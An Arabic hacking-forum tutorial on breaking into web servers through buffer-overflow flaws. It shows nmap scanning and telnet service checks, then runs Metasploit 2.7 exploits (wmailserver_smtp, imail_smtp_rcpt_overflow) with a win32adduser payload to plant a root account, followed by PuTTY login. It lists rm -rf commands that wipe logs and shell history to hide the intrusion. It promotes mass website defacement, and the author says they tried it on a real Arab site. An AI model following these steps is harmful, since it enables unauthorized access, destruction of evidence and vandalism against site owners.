شرح استغلال ثغرات الاوفر فلو

عضو لامع عدد المساهمات : 447

شرح استغلال ثغرات الاوفر فلو
=================
طبعـا اليوم شرح حصري بالصورة عام 2009 على شلون انساك وبس---------------------------------------------------------------
ارجو استخدمهـا شكل صحيح ===>>>
ارجو كذلك تركيز على الشرح لان بالصورة -->>
شرح متعوب عليـه من قبل فريق قرصنـه ->
-------------------------------------------
لكن للاسف كثير ,بل الغالبية لا يعرف يعنى شو اوفر فلو, وما يعرف كيف يستخدمها
لذلك أنا سأقدم موضوع جديد جدا نعرف فيه كيف نستخدم ثغرات الاوفر فلو , فى اختراق السيرفرات
-------------------------------------------
طبعـأ موضوع مشروح من قبـل جني هكـر موقع اجنبي بس غير مفهم
-------------------------------------------
الاصابة بثغرة اوفر فلو قد يعطى المستخدم الريموتremote بواسطة تغغير عنوان العودة ان يسيطر على البرنامج ومنها على النظام
---------------------
اولا: خطوات تنفيذ استغلال ثغرات الاوفر فلو .
1- عمل مسح شامل على السيرفر لمعرفة البرامج الراكبه على السيرفر
2- الاتصال عن طريق التلنت بالسيرفر للتأكد من تواجد البرنامج وانه شغال
3- بمعرفة أسماء البرامج الراكبه على السيرفر, سنبحث عن ثغرة اوفر فلو فى مواقع السيكيورتى
خاصة باى برنامج راكب على سيرفر ( وهتكون خاصة بالميتاسبليوت)
4-استخدام واستغلال ثغرة الاوفر فلو بواسطة الme t asploit
5-بواسطة خيارات والامكانيات التى ستقدمها الثغرة راح نحصل الروت ونضيف حساب روت جديد
6-استخدام أداة الputty والاتصال بالسيرفر كمستخدم جذر(root)
-----------------------------

1-اولا:عمل مسح شامل على السيرفر لمعرفة البرامج الراكبه على السيرفر

وسنستخدم أداة الnamp الشهيرة

لتحميل الاداة
كود PHP:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

نبدأ الشرح:
1- نذهب للدوس ونشغل الاداة
2- نكتب الامر nmap -P0 [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ونغير site لاسم الموقع اللى هنعمل عليه سكان

ملحوظه: حماية السيرفرات قد تمنع عملية المسح على السيرفر, لذلك سنستخدم أمر اخر اذا ما نفع الاول وهو:
nmap -sS -o -v [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ملحوظه: الامر الثانى للمسح بيتم تسجيله فى اللوج فى السيرفر , يعنى بعد ما تصبح روت ما تنسى ياشاطر تمسح اللوج

وعندك أوامر مسح اللوج
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log

وكمان فيه اسكربت بغلة البيرل موجود ما بتذكر اسمه الان اسحبه على السيرفر وشغله وراح يمسح كل شىء

الصورة

بدأ المسح على السيرفر وفى النهاية هنشوف البرامج اللى على السيرفر
شوف الصورة :

طبعا من الصورة عرفنا البرامج اللى راكبه , والاستغلال راح يكون على البرامج اللى بورتاتها مفتوحة
عشان احنا هنشتغل remote يعنى لازم البورت اللى بيتشغل عليه البرنامج يكون
مفتوح

لو تلاحظ أيضا فالاسفل , المسح طلع لنا بيانات السيرفر وهو اوبنتو واصدار الكيرنل , مفيد برده
المهم عشان نتأكد ان البرنامج اللى هنشتغل عليه شغال هنستخدم التلنت
وخظوتنا الثانية هى:
الاتصال عن طريق التلنت بالسيرفر للتأكد من تواجد البرنامج وانه شغال
نفترض انه اللى هنتصل بيه هو pop3 اللى شغال على البورت 110
نروح للدوس ونكتب telnet ثم نكتب o ثم [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] port مع تغيير site بأسم الموقع والport برقم البورت اللى شغال عليه البرنامج
شوف الصورة :

والصورة التالية تأكد انه تم الاتصال بالبرنامج اللى على السيرفر وانه شغال تمام
شوف الصورة :

مرحبا بكم واسف لتأخير الجزء الثانى من الموضوع تــابعوا معى :

نأتى للخطوة الثالثة وهى:

بمعرفة أسماء البرامج الراكبه على السيرفر, سنبحث عن ثغرة اوفر فلو فى مواقع السيكيورتى خاصة باى برنامج

راكب على سيرفر ( وهتكون خاصة بالميتاسبليوت)
اولا : نحمل أداة الme t asploit

كود PHP:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] t asploit.com/tools/framework-2.7.exe

ملحوظه: لاتنسى تزيل الفواصل فى كلمة ميتا اسبلويت عشان تحمل, وانا سويت هيك عشان ما تتشفر الكلمة
بعدين نسطب الاداة عادى نروح نشغلها من مجلده الاساسى على المسار
C:\Program Files\M e t a sploit\Framework2
راح تلقى msfconsole اضغط عليها لتشغيل الاداة

كلنا نعلم ان هذه الاداة يكون معاها ثغرات اوفر فلو ممكن نستخدمها
خلونا نشوف مثال:

بعد تشغيل الاداة نكتب show exploits وهو لعرض الثغرات المحفوظة فى البرنامج
شوف الصورة :

بعد ما شوفنا اسماء الثغرات على اليسار , ونوعها على اليمين , خلونا نجرب واحده ونشوف
راح نجرب الثغرة اللى اسمها wmailserver_smtp
اولا هنكتب أمر استخدام الثغرة وهو
use wmailserver_smtp
بعدين هنكتب show options لاظهار خيارت الثغرة
بعدين عشان نجربها على موقع نكتب
set RHOST [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ثم نكتب show PAYLOADS لاظهار خيارات وامكانيات الثغرة
شوف الصورة.

طب بعد ما شوفنا ثغرة من اللى موجودة على البرنامج , طب خلونا ندور على ثغرة من اى موقع سيكيورتى ونشغلها بالبرنامج
لازم الثغرة اللى هنحضرها تكون خاصة بالميتاسبلويت وهتعرفها ان اخرها m e t a
مثل هذه : eIQnetworks ESA SEARCHREPORT Remote Overflow Exploit (****)

كود PHP:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

نفرض اننا هندور على ثغرة خاصة بالimail وهيكون اسمها
imail_smtp_rcpt_overflow
علطول نأخذ كود الثغرة ونحفظها بأمتداد pm ونضعها فى فولدر الexploits الخاصة بالميتاسبلويت
على المسار التالى:
C:\Program Files\xxxxsploit\Framework2\home\framework\exploit s
شوف الصورة عشان حفظ الثغرة بأسم بيعتمد على حسب ما مكتوب فيها
شوف الصورة :

بعد ما وضعنا الثغرة فى المسار اللى قولنا عليه , نشغل البرنامج من جديد ونكتب show exploits
راح تجد ان الثغرة انضافت
شوف الصورة :

يلا نبدأ نستخدم ثغرتنا , وهذه الثغرة من قوتها راح تعطينا امكانية اضافة يوزر روت جديد
شوف الصورة :

الخطوات:
1- نكتب أمر استخدام الثغرة use imail_smtp_rcpt_overflow
2-نكتب show PAYLOADS
3- نكتب set RHOST [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] .com
4- نكتب set PAYLOAD win32adduser لاستخدام هذا الخيار
5- نكتب show options

ملحوظه مهمه جدا: لاحظ انى كتبت RHOST وليس rhost وكتبت PAYLOAD وليس payload
لانه ممكن ما يظبط الحروف الsmall معك , ولو تلاحظ أسفل الصورة السابقة معطينى تحذير بذلك , وانا تعمدت ذلك عشان تتذكر ......
راح يطلع لنا مثل اللى فى الصورة ...

علطول نكتب

set pass metoovet
set user metoovet
وذلك لاضافة يوزر اسمه metoovet وباسورده هو metoovet
بعدين نكتب show options مرة أخرى عشان نشوف التغيرات
راح تشوف ان اليوزر والباس انضافوا

شوف الصورة :

لم يبقى الا خطوة واحدة وهى استغلال الثغرة وذلك بكتابة exploit
وراح تنفذ الثغرة وينضاف المستخدم الجذر الجديد

عذرا اذا ما كملت وكتبت exploit لاستغلال الثغرة , لانى بمحض الصدفة كان التطبيق على موقع عربى مشهور جدا جدا , والمواقع عزيز عليا

لذا ما أحب جلب الاذى لاحد , فقط كانت تجربة مش أكثر

بعد ما انضاف وصرنا روت
علطول نستخدم اداة الputty وندخل كأحلى روت
وتعمل اللى عايز تعمله ( ماس ديفيس وأحلى اندكسات وتسجيل على الزون)
يمكن تحميل الاداة من الرابط الاتى:
كود PHP:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

انتـهـى الشرح
تحياتي
الكم